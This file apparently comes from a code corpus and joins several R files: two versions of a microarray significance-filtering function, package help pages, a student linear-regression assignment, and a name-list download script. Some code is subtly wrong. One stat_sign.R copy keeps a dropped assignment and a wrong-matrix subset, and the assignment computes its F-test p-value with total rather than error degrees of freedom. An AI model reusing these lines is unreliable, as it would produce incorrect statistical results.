    if(exists("lumi_NQ.f"))ee<-length(lumi_NQ.f)
    if(exists("data.matrix_Nimblegen2.f"))ff<-length(data.matrix_Nimblegen2.f)
    if(exists("data.matrixNorm.f"))gg<-length(data.matrixNorm.f)
    if(exists("data.matrix_onlineNorm.f"))hh<-length(data.matrix_onlineNorm.f)
  }),silent=TRUE)
  # Clear stale results from a previous run before recomputing.
  dat2Affy.s<-NULL;datAgOne2.s<-NULL;datAgTwo2.s<-NULL;datIllBA2.s<-NULL;lumi_NQ.s<-NULL;data.matrix_Nimblegen2.s<-NULL;
  data.matrixNorm.s<-NULL;data.matrix_onlineNorm.s<-NULL;
  ttx<-NULL
  rm(dat2Affy.s,datAgOne2.s,datAgTwo2.s,datIllBA2.s,lumi_NQ.s,data.matrix_Nimblegen2.s,
    data.matrixNorm.s,data.matrix_onlineNorm.s,
    ttx)
  # Affymetrix
  if(aa!=0){
    err<-try(ttx<<-toptable(dat2Affy.f,coef=2,number=nrow(use.dat2Affy.m)),silent=TRUE)
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(dat2Affy.f,coef=3,number=nrow(use.dat2Affy.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(dat2Affy.f,coef=4,number=nrow(use.dat2Affy.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)ttx<<-toptable(dat2Affy.f,number=nrow(use.dat2Affy.m))
    # Probes significant at the 0.01 level.
    rn<-rownames(ttx)[ttx$P.Value<=0.01]
    err<-try(dat2Affy.s<<-use.dat2Affy.m[rn,],silent=TRUE)
    if(length(grep("Error",err))!=0)try(dat2Affy.s<<-use.dat2Affy.m[as.numeric(rn),],silent=TRUE)
    if(length(dat2Affy.s)!=0){
      visible(g1_1)<-FALSE
      l$Affymetrix$Stat_Significant<<-list()
      tr<<-gtree(offspring=tree,container=g1_1)
      size(tr)<-c(300,400)
      visible(g1_1)<-TRUE
    }
    display()
  }
  # Agilent one-color
  if(bb!=0){
    err<-try(ttx<<-toptable(datAgOne2.f,coef=2,number=nrow(use.datAgOne2.m)),silent=TRUE)
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(datAgOne2.f,coef=3,number=nrow(use.datAgOne2.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(datAgOne2.f,coef=4,number=nrow(use.datAgOne2.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)ttx<<-toptable(datAgOne2.f,number=nrow(use.datAgOne2.m))
    rn<-rownames(ttx)[ttx$P.Value<=0.01]
    err<-try(datAgOne2.s<<-use.datAgOne2.m[rn,],silent=TRUE)
    if(length(grep("Error",err))!=0)try(datAgOne2.s<<-use.datAgOne2.m[as.numeric(rn),],silent=TRUE)
    if(length(datAgOne2.s)!=0){
      visible(g1_1)<-FALSE
      l$Agilent_OneColor$Stat_Significant<<-list()
      tr<<-gtree(offspring=tree,container=g1_1)
      size(tr)<-c(300,400)
      visible(g1_1)<-TRUE
    }
    display()
  }
  # Agilent two-color
  if(cc!=0){
    err<-try(ttx<<-toptable(datAgTwo2.f,coef=2,number=nrow(use.datAgTwo2.m)),silent=TRUE)
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(datAgTwo2.f,coef=3,number=nrow(use.datAgTwo2.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(datAgTwo2.f,coef=4,number=nrow(use.datAgTwo2.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)ttx<<-toptable(datAgTwo2.f,number=nrow(use.datAgTwo2.m))
    rn<-rownames(ttx)[ttx$P.Value<=0.01]
    err<-try(datAgTwo2.s<<-use.datAgTwo2.m[rn,],silent=TRUE)
    if(length(grep("Error",err))!=0)try(datAgTwo2.s<<-use.datAgTwo2.m[as.numeric(rn),],silent=TRUE)
    if(length(datAgTwo2.s)!=0){
      visible(g1_1)<-FALSE
      l$Agilent_TwoColor$Stat_Significant<<-list()
      tr<<-gtree(offspring=tree,container=g1_1)
      size(tr)<-c(300,400)
      visible(g1_1)<-TRUE
    }
    display()
  }
  # Illumina BeadArray
  if(dd!=0){
    err<-try(ttx<<-toptable(datIllBA2.f,coef=2,number=nrow(use.datIllBA2.m2)),silent=TRUE)
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(datIllBA2.f,coef=3,number=nrow(use.datIllBA2.m2)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(datIllBA2.f,coef=4,number=nrow(use.datIllBA2.m2)),silent=TRUE)
    }
    # BUG FIX: the fallback toptable() result was previously computed but
    # never assigned to ttx, so a failed coef=4 attempt left ttx stale.
    if(length(grep("Error",err))!=0)ttx<<-toptable(datIllBA2.f,number=nrow(use.datIllBA2.m2))
    rn<-rownames(ttx)[ttx$P.Value<=0.01]
    err<-try(datIllBA2.s<<-use.datIllBA2.m2[rn,],silent=TRUE)
    if(length(grep("Error",err))!=0)try(datIllBA2.s<<-use.datIllBA2.m2[as.numeric(rn),],silent=TRUE)
    if(length(datIllBA2.s)!=0){
      visible(g1_1)<-FALSE
      l$Illumina_Beadarray$Stat_Significant<<-list()
      tr<<-gtree(offspring=tree,container=g1_1)
      size(tr)<-c(300,400)
      visible(g1_1)<-TRUE
    }
    display()
  }
  # Illumina lumi
  if(ee!=0){
    err<-try(ttx<<-toptable(lumi_NQ.f,coef=2,number=nrow(use.lumi_NQ.m)),silent=TRUE)
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(lumi_NQ.f,coef=3,number=nrow(use.lumi_NQ.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(lumi_NQ.f,coef=4,number=nrow(use.lumi_NQ.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)ttx<<-toptable(lumi_NQ.f,number=nrow(use.lumi_NQ.m))
    rn<-rownames(ttx)[ttx$P.Value<=0.01]
    err<-try(lumi_NQ.s<<-use.lumi_NQ.m[rn,],silent=TRUE)
    if(length(grep("Error",err))!=0)try(lumi_NQ.s<<-use.lumi_NQ.m[as.numeric(rn),],silent=TRUE)
    if(length(lumi_NQ.s)!=0){
      visible(g1_1)<-FALSE
      l$Illumina_Lumi$Stat_Significant<<-list()
      tr<<-gtree(offspring=tree,container=g1_1)
      size(tr)<-c(300,400)
      visible(g1_1)<-TRUE
    }
    display()
  }
  # NimbleGen
  if(ff!=0){
    err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=2,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=3,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=4,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrix_Nimblegen2.f,number=nrow(use.data.matrix_Nimblegen2.m))
    rn<-rownames(ttx)[ttx$P.Value<=0.01]
    err<-try(data.matrix_Nimblegen2.s<<-use.data.matrix_Nimblegen2.m[rn,],silent=TRUE)
    if(length(grep("Error",err))!=0)try(data.matrix_Nimblegen2.s<<-use.data.matrix_Nimblegen2.m[as.numeric(rn),],silent=TRUE)
    if(length(data.matrix_Nimblegen2.s)!=0){
      visible(g1_1)<-FALSE
      l$Nimblegen$Stat_Significant<<-list()
      tr<<-gtree(offspring=tree,container=g1_1)
      size(tr)<-c(300,400)
      visible(g1_1)<-TRUE
    }
    display()
  }
  # Series matrix
  if(gg!=0){
    err<-try(ttx<<-toptable(data.matrixNorm.f,coef=2,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(data.matrixNorm.f,coef=3,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(data.matrixNorm.f,coef=4,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrixNorm.f,number=nrow(use.data.matrixNorm.m))
    rn<-rownames(ttx)[ttx$P.Value<=0.01]
    err<-try(data.matrixNorm.s<<-use.data.matrixNorm.m[rn,],silent=TRUE)
    if(length(grep("Error",err))!=0)try(data.matrixNorm.s<<-use.data.matrixNorm.m[as.numeric(rn),],silent=TRUE)
    if(length(data.matrixNorm.s)!=0){
      visible(g1_1)<-FALSE
      l$Series_Matrix$Stat_Significant<<-list()
      tr<<-gtree(offspring=tree,container=g1_1)
      size(tr)<-c(300,400)
      visible(g1_1)<-TRUE
    }
    display()
  }
  # Online data
  if(hh!=0){
    err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=2,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=3,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)
    {
      err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=4,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
    }
    if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrix_onlineNorm.f,number=nrow(use.data.matrix_onlineNorm.m))
    rn<-rownames(ttx)[ttx$P.Value<=0.01]
    # BUG FIX: previously subset the series-matrix data (use.data.matrixNorm.m)
    # instead of the online data's own normalized matrix.
    err<-try(data.matrix_onlineNorm.s<<-use.data.matrix_onlineNorm.m[rn,],silent=TRUE)
    if(length(grep("Error",err))!=0)try(data.matrix_onlineNorm.s<<-use.data.matrix_onlineNorm.m[as.numeric(rn),],silent=TRUE)
    if(length(data.matrix_onlineNorm.s)!=0){
      visible(g1_1)<-FALSE
      l$Online_Data$Stat_Significant<<-list()
      tr<<-gtree(offspring=tree,container=g1_1)
      size(tr)<-c(300,400)
      visible(g1_1)<-TRUE
    }
    display()
  }
}
| /maGUI/R/stat_sign.R | no_license | ingted/R-Examples | R | false | false | 8,810 | r | stat_sign<-function(h,...){
try(({
dat2Affy.f<-dat2Affy.f;datAgOne2.f<-datAgOne2.f;datAgTwo2.f<-datAgTwo2.f;datIllBA2.f<-datIllBA2.f;
lumi_NQ.f<-lumi_NQ.f;data.matrix_Nimblegen2.f<-data.matrix_Nimblegen2.f;
data.matrixNorm.f<-data.matrixNorm.f;data.matrix_onlineNorm.f<-data.matrix_onlineNorm.f;
use.dat2Affy.m<-use.dat2Affy.m;use.datAgOne2.m<-use.datAgOne2.m;use.datAgTwo2.m<-use.datAgTwo2.m;
use.datIllBA2.m2<-use.datIllBA2.m2;use.lumi_NQ.m<-use.lumi_NQ.m;
use.data.matrix_Nimblegen2.m<-use.data.matrix_Nimblegen2.m;
use.data.matrixNorm.m<-use.data.matrixNorm.m;use.data.matrix_onlineNorm.m<-use.data.matrix_onlineNorm.m;l<-l;tree<-tree;
}),silent=TRUE)
aa=0;bb=0;cc=0;dd=0;ee=0;ff=0;gg=0;hh=0;
try(({
if(exists("dat2Affy.f"))aa=length(dat2Affy.f)
if(exists("datAgOne2.f"))bb=length(datAgOne2.f)
if(exists("datAgTwo2.f"))cc=length(datAgTwo2.f)
if(exists("datIllBA2.f"))dd=length(datIllBA2.f)
if(exists("lumi_NQ.f"))ee=length(lumi_NQ.f)
if(exists("data.matrix_Nimblegen2.f"))ff=length(data.matrix_Nimblegen2.f)
if(exists("data.matrixNorm.f"))gg=length(data.matrixNorm.f)
if(exists("data.matrix_onlineNorm.f"))hh=length(data.matrix_onlineNorm.f)
}),silent=TRUE)
dat2Affy.s=NULL;datAgOne2.s=NULL;datAgTwo2.s=NULL;datIllBA2.s=NULL;lumi_NQ.s=NULL;data.matrix_Nimblegen2.s=NULL;
data.matrixNorm.s=NULL;data.matrix_onlineNorm.s=NULL;
ttx=NULL
rm(dat2Affy.s,datAgOne2.s,datAgTwo2.s,datIllBA2.s,lumi_NQ.s,data.matrix_Nimblegen2.s,
data.matrixNorm.s,data.matrix_onlineNorm.s,
ttx)
if(aa!=0){
err<-try(ttx<<-toptable(dat2Affy.f,coef=2,number=nrow(use.dat2Affy.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(dat2Affy.f,coef=3,number=nrow(use.dat2Affy.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(dat2Affy.f,coef=4,number=nrow(use.dat2Affy.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(dat2Affy.f,number=nrow(use.dat2Affy.m))
rn<-row.names(ttx)[ttx$P.Value<=0.01]
err<-try(dat2Affy.s<<-use.dat2Affy.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(dat2Affy.s<<-use.dat2Affy.m[as.numeric(rn),],silent=TRUE)
if(length(dat2Affy.s)!=0){
visible(g1_1)<-FALSE
l$Affymetrix$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(bb!=0){
err<-try(ttx<<-toptable(datAgOne2.f,coef=2,number=nrow(use.datAgOne2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgOne2.f,coef=3,number=nrow(use.datAgOne2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgOne2.f,coef=4,number=nrow(use.datAgOne2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(datAgOne2.f,number=nrow(use.datAgOne2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datAgOne2.s<<-use.datAgOne2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datAgOne2.s<<-use.datAgOne2.m[as.numeric(rn),],silent=TRUE)
if(length(datAgOne2.s)!=0){
visible(g1_1)<-FALSE
l$Agilent_OneColor$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(cc!=0){
err<-try(ttx<<-toptable(datAgTwo2.f,coef=2,number=nrow(use.datAgTwo2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgTwo2.f,coef=3,number=nrow(use.datAgTwo2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datAgTwo2.f,coef=4,number=nrow(use.datAgTwo2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(datAgTwo2.f,number=nrow(use.datAgTwo2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datAgTwo2.s<<-use.datAgTwo2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datAgTwo2.s<<-use.datAgTwo2.m[as.numeric(rn),],silent=TRUE)
if(length(datAgTwo2.s)!=0){
visible(g1_1)<-FALSE
l$Agilent_TwoColor$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(dd!=0){
err<-try(ttx<<-toptable(datIllBA2.f,coef=2,number=nrow(use.datIllBA2.m2)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datIllBA2.f,coef=3,number=nrow(use.datIllBA2.m2)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(datIllBA2.f,coef=4,number=nrow(use.datIllBA2.m2)),silent=TRUE)
}
if(length(grep("Error",err))!=0)toptable(datIllBA2.f,number=nrow(use.datIllBA2.m2))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(datIllBA2.s<<-use.datIllBA2.m2[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(datIllBA2.s<<-use.datIllBA2.m2[as.numeric(rn),],silent=TRUE)
if(length(datIllBA2.s)!=0){
visible(g1_1)<-FALSE
l$Illumina_Beadarray$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(ee!=0){
err<-try(ttx<<-toptable(lumi_NQ.f,coef=2,number=nrow(use.lumi_NQ.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(lumi_NQ.f,coef=3,number=nrow(use.lumi_NQ.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(lumi_NQ.f,coef=4,number=nrow(use.lumi_NQ.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(lumi_NQ.f,number=nrow(use.lumi_NQ.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(lumi_NQ.s<<-use.lumi_NQ.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(lumi_NQ.s<<-use.lumi_NQ.m[as.numeric(rn),],silent=TRUE)
if(length(lumi_NQ.s)!=0){
visible(g1_1)<-FALSE
l$Illumina_Lumi$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(ff!=0){
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=2,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=3,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_Nimblegen2.f,coef=4,number=nrow(use.data.matrix_Nimblegen2.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrix_Nimblegen2.f,number=nrow(use.data.matrix_Nimblegen2.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrix_Nimblegen2.s<<-use.data.matrix_Nimblegen2.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrix_Nimblegen2.s<<-use.data.matrix_Nimblegen2.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrix_Nimblegen2.s)!=0){
visible(g1_1)<-FALSE
l$Nimblegen$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(gg!=0){
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=2,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=3,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrixNorm.f,coef=4,number=nrow(use.data.matrixNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrixNorm.f,number=nrow(use.data.matrixNorm.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrixNorm.s<<-use.data.matrixNorm.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrixNorm.s<<-use.data.matrixNorm.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrixNorm.s)!=0){
visible(g1_1)<-FALSE
l$Series_Matrix$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
if(hh!=0){
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=2,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=3,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)
{
err<-try(ttx<<-toptable(data.matrix_onlineNorm.f,coef=4,number=nrow(use.data.matrix_onlineNorm.m)),silent=TRUE)
}
if(length(grep("Error",err))!=0)ttx<<-toptable(data.matrix_onlineNorm.f,number=nrow(use.data.matrix_onlineNorm.m))
rn<-rownames(ttx)[ttx$P.Value<=0.01]
err<-try(data.matrix_onlineNorm.s<<-use.data.matrixNorm.m[rn,],silent=TRUE)
if(length(grep("Error",err))!=0)try(data.matrix_onlineNorm.s<<-use.data.matrixNorm.m[as.numeric(rn),],silent=TRUE)
if(length(data.matrix_onlineNorm.s)!=0){
visible(g1_1)<-FALSE
l$Online_Data$Stat_Significant<<-list()
tr<<-gtree(offspring=tree,container=g1_1)
size(tr)<-c(300,400)
visible(g1_1)<-TRUE
}
display()
}
}
|
% Generated by roxygen2: do not edit by hand
% Please edit documentation in R/get_data_to_plot.R, R/helper.R
\name{prin_curve_loc}
\alias{prin_curve_loc}
\title{Principal curve locations}
\usage{
prin_curve_loc(D, ...)
}
\arguments{
\item{D}{A square matrix of pairwise dissimilarities}
\item{...}{Other parameters for the princurve::principal_curve function.}
}
\value{
A numeric vector of positions along the fitted principal curve.
}
\description{
Estimating locations of data points projected on a principal curve fitted
to a PCoA 2D representation
}
| /man/prin_curve_loc.Rd | no_license | AsclepiusInformatica/buds | R | false | true | 873 | rd | % Generated by roxygen2: do not edit by hand
% Please edit documentation in R/get_data_to_plot.R, R/helper.R
\name{prin_curve_loc}
\alias{prin_curve_loc}
\title{Principal curve locations}
\usage{
prin_curve_loc(D, ...)
}
\arguments{
\item{D}{A square matrix of pairwise dissimilarities}
\item{...}{Other parameters for the princurve::principal_curve function.}
}
\value{
A numeric vector of positions along the fitted principal curve.
}
\description{
Estimating locations of data points projected on a principal curve fitted
to a PCoA 2D representation
}
|
\name{residualPlots}
\alias{residualPlots}
\title{
Residual Plots for Linear Regression
}
\description{
Provides four plots based on residuals. Clockwise from upper left: 1. histogram of standardized residuals, 2. residuals vs. fitted values, 3. Standardized Residuals vs. Leverage (hat) values, and 4. Normal Probability Plot of Residuals.
}
\usage{
residualPlots(out, bigres = 3, bighat = 3, cutoff = 1)
}
\arguments{
\item{out}{output from \code{lm}}
\item{bigres}{cut-off for large std residuals}
\item{bighat}{multiple of mean leverage value to flag for large leverage}
\item{cutoff}{cut-off for Cooks Distance values}
}
\details{
yellow lines (if present) on leverage vs. std residuals plot indicate large residuals. Green line (if present) delimits large leverage values. Large red values (if present) indicate large Cooks Distance values. P-value for Anderson-Darling test of normality is indicated on normal probability plot.
}
\value{
\item{large_res}{indices of observations with large std residuals, if any}
\item{large_lever}{indices of observations with large leverage values, if any}
\item{large_CooksD}{indices of observations with large Cooks Distance, if any}
}
\author{
Peter E. Rossi, Anderson School UCLA, \email{perossichi@gmail.com}
}
\examples{
data(Flat_Panel_TV)
out=residualPlots(lm(Flat_Panel_TV$Price~Flat_Panel_TV$Size))
}
% Add one or more standard keywords, see file 'KEYWORDS' in the
% R documentation directory.
\keyword{Statistics}
\keyword{regression}
| /man/residualPlots.Rd | no_license | cran/PERregress | R | false | false | 1,507 | rd | \name{residualPlots}
\alias{residualPlots}
\title{
Residual Plots for Linear Regression
}
\description{
Provides four plots based on residuals. Clockwise from upper left: 1. histogram of standardized residuals, 2. residuals vs. fitted values, 3. Standardized Residuals vs. Leverage (hat) values, and 4. Normal Probability Plot of Residuals.
}
\usage{
residualPlots(out, bigres = 3, bighat = 3, cutoff = 1)
}
\arguments{
\item{out}{output from \code{lm}}
\item{bigres}{cut-off for large std residuals}
\item{bighat}{multiple of mean leverage value to flag for large leverage}
\item{cutoff}{cut-off for Cooks Distance values}
}
\details{
yellow lines (if present) on leverage vs. std residuals plot indicate large residuals. Green line (if present) delimits large leverage values. Large red values (if present) indicate large Cooks Distance values. P-value for Anderson-Darling test of normality is indicated on normal probability plot.
}
\value{
\item{large_res}{indices of observations with large std residuals, if any}
\item{large_lever}{indices of observations with large leverage values, if any}
\item{large_CooksD}{indices of observations with large Cooks Distance, if any}
}
\author{
Peter E. Rossi, Anderson School UCLA, \email{perossichi@gmail.com}
}
\examples{
data(Flat_Panel_TV)
out=residualPlots(lm(Flat_Panel_TV$Price~Flat_Panel_TV$Size))
}
% Add one or more standard keywords, see file 'KEYWORDS' in the
% R documentation directory.
\keyword{Statistics}
\keyword{regression}
|
# Assignment: ASSIGNMENT 6
# Name: Hoffmann, Laura
# Date: 7/04/2020
## Set the working directory to the root of your DSC 520 directory
setwd("~/RStudio/dsc520")
## Load the `data/r4ds/heights.csv` to
heights_df <- read.csv("data/r4ds/heights.csv")
## Load the ggplot2 library
library(ggplot2)
## Fit a linear model using the `age` variable as the predictor and `earn` as the outcome
age_lm <- lm(earn~age, data=heights_df)
## View the summary of your model using `summary()`
summary(age_lm)
## Creating predictions using `predict()`
age_predict_df <- data.frame(earn = predict(age_lm, heights_df), age = heights_df$age)
## Plot the predictions against the original data
ggplot(data = heights_df, aes(y = earn, x = age)) +
geom_point(color='blue') +
geom_line(color='red',data = age_predict_df, aes(y=earn, x=age))
mean_earn <- mean(heights_df$earn)
## Corrected Sum of Squares Total
sst <- sum((mean_earn - heights_df$earn)^2)
## Corrected Sum of Squares for Model
ssm <- sum((mean_earn - age_predict_df$earn)^2)
## Residuals
residuals <- heights_df$earn - age_predict_df$earn
## Sum of Squares for Error
sse <- sum(residuals^2)
## R Squared R^2 = SSM\SST
r_squared <- ssm/sst
## Number of observations
n <- nrow(age_predict_df)
## Number of regression parameters
p <- 2
## Corrected Degrees of Freedom for Model (p-1)
dfm <- p - 1
## Degrees of Freedom for Error (n-p)
dfe <- n - p
## Corrected Degrees of Freedom Total: DFT = n - 1
dft <- n - 1
## Mean of Squares for Model: MSM = SSM / DFM
msm <- ssm/dfm
## Mean of Squares for Error: MSE = SSE / DFE
mse <- sse/dfe
## Mean of Squares Total: MST = SST / DFT
mst <- sst/dft
## F Statistic F = MSM/MSE
f_score <- msm/mse
## Adjusted R Squared R2 = 1 - (1 - R2)(n - 1) / (n - p)
adjusted_r_squared <- 1-(1-r_squared)*dft/dfe
## Calculate the p-value from the F distribution
p_value <- pf(f_score, dfm, dft, lower.tail=F)
| /assignment_06_HoffmannLaura.R | no_license | LauraHoffmann-DataScience/DSC520 | R | false | false | 1,963 | r | # Assignment: ASSIGNMENT 6
# Name: Hoffmann, Laura
# Date: 7/04/2020
## Set the working directory to the root of your DSC 520 directory
setwd("~/RStudio/dsc520")
## Load the `data/r4ds/heights.csv` to
heights_df <- read.csv("data/r4ds/heights.csv")
## Load the ggplot2 library
library(ggplot2)
## Fit a linear model using the `age` variable as the predictor and `earn` as the outcome
age_lm <- lm(earn~age, data=heights_df)
## View the summary of your model using `summary()`
summary(age_lm)
## Creating predictions using `predict()`
age_predict_df <- data.frame(earn = predict(age_lm, heights_df), age = heights_df$age)
## Plot the predictions against the original data
ggplot(data = heights_df, aes(y = earn, x = age)) +
geom_point(color='blue') +
geom_line(color='red',data = age_predict_df, aes(y=earn, x=age))
mean_earn <- mean(heights_df$earn)
## Corrected Sum of Squares Total
sst <- sum((mean_earn - heights_df$earn)^2)
## Corrected Sum of Squares for Model
ssm <- sum((mean_earn - age_predict_df$earn)^2)
## Residuals
residuals <- heights_df$earn - age_predict_df$earn
## Sum of Squares for Error
sse <- sum(residuals^2)
## R Squared R^2 = SSM\SST
r_squared <- ssm/sst
## Number of observations
n <- nrow(age_predict_df)
## Number of regression parameters
p <- 2
## Corrected Degrees of Freedom for Model (p-1)
dfm <- p - 1
## Degrees of Freedom for Error (n-p)
dfe <- n - p
## Corrected Degrees of Freedom Total: DFT = n - 1
dft <- n - 1
## Mean of Squares for Model: MSM = SSM / DFM
msm <- ssm/dfm
## Mean of Squares for Error: MSE = SSE / DFE
mse <- sse/dfe
## Mean of Squares Total: MST = SST / DFT
mst <- sst/dft
## F Statistic F = MSM/MSE
f_score <- msm/mse
## Adjusted R Squared R2 = 1 - (1 - R2)(n - 1) / (n - p)
adjusted_r_squared <- 1-(1-r_squared)*dft/dfe
## Calculate the p-value from the F distribution
p_value <- pf(f_score, dfm, dft, lower.tail=F)
|
# code to prepare `gimei` dataset goes here
# from: 'https://github.com/willnet/gimei'
# Download and parse the gimei name list (YAML) directly from GitHub;
# the connection is closed on exit of the anonymous function.
yaml <- (function() {
con <- url(
"https://raw.githubusercontent.com/willnet/gimei/main/lib/data/names.yml",
open = "r",
encoding = "UTF-8"
)
on.exit(close(con))
return(yaml::read_yaml(con))
})()
# Only the female first names are used (original comment: 女性名だけしか使わない).
# Each entry is a triple: [kanji, hiragana, katakana].
gimei <- purrr::map_dfr(
yaml$first_name$female,
~ data.frame(
kanji = .[1],
hiragana = .[2],
katakana = .[3]
)
)
# Store the resulting data frame as a package dataset.
usethis::use_data(gimei, overwrite = TRUE)
| /data-raw/gimei.R | permissive | paithiov909/shaketoba | R | false | false | 517 | r | # code to prepare `gimei` dataset goes here
# from: 'https://github.com/willnet/gimei'
# Download and parse the gimei name list (YAML) directly from GitHub;
# the connection is closed on exit of the anonymous function.
yaml <- (function() {
con <- url(
"https://raw.githubusercontent.com/willnet/gimei/main/lib/data/names.yml",
open = "r",
encoding = "UTF-8"
)
on.exit(close(con))
return(yaml::read_yaml(con))
})()
# Only the female first names are used (original comment: 女性名だけしか使わない).
# Each entry is a triple: [kanji, hiragana, katakana].
gimei <- purrr::map_dfr(
yaml$first_name$female,
~ data.frame(
kanji = .[1],
hiragana = .[2],
katakana = .[3]
)
)
# Store the resulting data frame as a package dataset.
